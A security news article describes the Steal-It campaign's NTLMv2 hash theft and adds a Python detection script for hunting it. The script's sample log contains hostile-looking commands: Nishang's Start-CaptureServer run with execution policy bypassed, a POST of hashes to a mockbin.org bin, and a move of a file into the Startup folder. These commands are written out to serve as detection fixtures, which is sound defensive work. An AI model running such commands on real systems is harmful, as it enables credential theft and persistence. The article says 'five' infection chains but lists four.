Tue. Oct 3rd, 2023
New Cyber Attack Campaign Stealing NTLMv2 Hashes

Zscaler ThreatLabz has discovered a recent cyber attack campaign, which it has named Steal-It, targeting compromised Windows systems primarily located in Australia, Poland, and Belgium. The attackers are using a PowerShell script associated with a legitimate red teaming tool to steal NTLMv2 hashes.

The campaign involves customized versions of Nishang’s Start-CaptureServer PowerShell script, which is used to execute system commands and exfiltrate the stolen NTLMv2 hashes via Mockbin APIs. Nishang is a framework and collection of PowerShell scripts and payloads commonly used in offensive security, penetration testing, and red teaming.

The attackers employ five different infection chains to target their victims. These include phishing emails containing ZIP archives, geofencing techniques, and specific lure tactics for different target groups. The infection chains are as follows:

1. NTLMv2 hash stealing infection chain: Utilizes a customized version of the Start-CaptureServer PowerShell script to harvest NTLMv2 hashes.
2. System info stealing infection chain: Targets Australian users by tricking them into downloading a CMD file that steals system information.
3. Fansly whoami infection chain: Tempts Polish users with explicit images of Ukrainian and Russian Fansly models, leading them to download a CMD file that exfiltrates the results of the whoami command.
4. Windows update infection chain: Targets Belgian users with fake Windows update scripts, running commands like tasklist and systeminfo.

Notably, the Computer Emergency Response Team of Ukraine (CERT-UA) previously highlighted the Windows update infection chain in May 2023 as part of an APT28 campaign against government institutions in Ukraine. This connection raises the possibility of the Steal-It campaign being the work of a Russian state-sponsored threat actor.

The security researchers analyzing the campaign comment on the threat actors’ technical expertise, as evidenced by their custom PowerShell scripts and strategic use of LNK files within ZIP archives. They also note how the threat actors maintain persistence by moving and renaming files in the Downloads and Startup folders.
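The behaviours described above (Nishang's Start-CaptureServer running under PowerShell, exfiltration to Mockbin, reconnaissance commands spawned from a CMD file in Downloads, and files moved into the Startup folder) can each be turned into a simple detection over process-creation telemetry. The script below is an added example written for this article; it is not code from Zscaler ThreatLabz or from the Nishang project. The pipe-separated log format, the hostnames, usernames and paths in the sample lines, and the use of mockbin.org as the exfiltration hostname are all assumptions constructed for the example.

```python
"""Detect Steal-It style activity in process-creation log lines.

Added example, not part of the original article. The log layout
(timestamp|host|user|parent_cmdline|image|cmdline) is an assumed,
constructed format, not any real product's schema.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass
class Event:
    timestamp: str
    host: str
    user: str
    parent_cmdline: str   # command line of the parent process
    image: str            # executable name or path of the new process
    cmdline: str          # full command line of the new process


def parse_line(line: str) -> Optional[Event]:
    """Parse one pipe-separated line; return None for malformed input instead of raising."""
    parts = line.rstrip("\r\n").split("|")
    if len(parts) != 6:
        return None
    return Event(*(p.strip() for p in parts))


# Regexes reused by the rules below.
_DOWNLOADS_CMD = re.compile(r"\\downloads\\[^\s\"]+\.cmd\b", re.I)
_FILE_MOVE_VERB = re.compile(r"\b(move|ren|rename|copy|xcopy)\b", re.I)
_RECON_IMAGES = {"whoami.exe", "tasklist.exe", "systeminfo.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


# Each rule maps one behaviour from the article to a predicate over an Event.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    # Nishang's Start-CaptureServer invoked from PowerShell (NTLMv2 hash capture)
    ("nishang_capture_server",
     lambda ev: "start-captureserver" in ev.cmdline.lower()),
    # Exfiltration to Mockbin APIs (mockbin.org assumed as the hostname)
    ("mockbin_exfil",
     lambda ev: "mockbin.org" in ev.cmdline.lower()),
    # whoami / tasklist / systeminfo spawned by a .cmd file run from Downloads
    ("recon_from_downloads_cmd",
     lambda ev: _basename(ev.image) in _RECON_IMAGES
     and _DOWNLOADS_CMD.search(ev.parent_cmdline) is not None),
    # A file being moved, renamed or copied into the per-user Startup folder
    ("startup_folder_persistence",
     lambda ev: _FILE_MOVE_VERB.search(ev.cmdline) is not None
     and "\\start menu\\programs\\startup\\" in ev.cmdline.lower()),
]


def scan(log_text: str) -> List[Tuple[str, Event]]:
    """Return (rule_name, event) for every rule that fires on every parseable line."""
    hits: List[Tuple[str, Event]] = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue  # skip malformed lines rather than abort the scan
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((name, ev))
    return hits


def summarize(hits: List[Tuple[str, Event]]) -> dict:
    """Count hits per rule name."""
    counts: dict = {}
    for name, _ in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample telemetry: one benign Outlook launch, the four campaign
# behaviours, a malformed line, and a benign systeminfo run by an administrator.
SAMPLE_LOG = r"""
2023-09-05T09:58:00Z|WS-PL-07|CONTOSO\jkowalski|explorer.exe|outlook.exe|"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
2023-09-05T10:01:13Z|WS-PL-07|CONTOSO\jkowalski|cmd.exe|powershell.exe|powershell.exe -ep bypass -c "Start-CaptureServer -IPAddress 0.0.0.0 -Port 80"
2023-09-05T10:03:41Z|WS-PL-07|CONTOSO\jkowalski|cmd.exe|powershell.exe|powershell.exe -c "Invoke-RestMethod -Uri https://mockbin.org/bin/PLACEHOLDER-ID -Method Post -Body $h"
2023-09-05T10:05:02Z|WS-AU-03|CONTOSO\bsmith|cmd.exe /c C:\Users\bsmith\Downloads\invoice.cmd|systeminfo.exe|systeminfo
2023-09-05T10:05:03Z|WS-AU-03|CONTOSO\bsmith|cmd.exe /c C:\Users\bsmith\Downloads\invoice.cmd|whoami.exe|whoami
2023-09-05T10:06:10Z|WS-BE-11|CONTOSO\ldupont|cmd.exe|cmd.exe|cmd.exe /c move C:\Users\ldupont\Downloads\update.cmd "C:\Users\ldupont\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.cmd"
garbage line without separators
2023-09-05T10:07:00Z|WS-BE-11|CONTOSO\admin|cmd.exe|systeminfo.exe|systeminfo
"""


if __name__ == "__main__":
    for rule, ev in scan(SAMPLE_LOG):
        print(f"{ev.timestamp} {ev.host} {ev.user} [{rule}] {ev.cmdline}")
    print(summarize(scan(SAMPLE_LOG)))
```

The last sample line shows why the reconnaissance rule keys on the parent process rather than on the command alone: `systeminfo` run interactively by an administrator is normal, while the same command spawned by a `.cmd` file in a user's Downloads folder matches the lure-driven chains the article describes. Matching on substrings such as the script name and the exfiltration host is brittle against renamed scripts and alternative hosting, so these rules are a starting point for hunting, not a replacement for broader telemetry.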

The Steal-It campaign serves as a reminder of the ongoing threats in the cybersecurity landscape, emphasizing the importance of strong security measures and being vigilant against suspicious activities.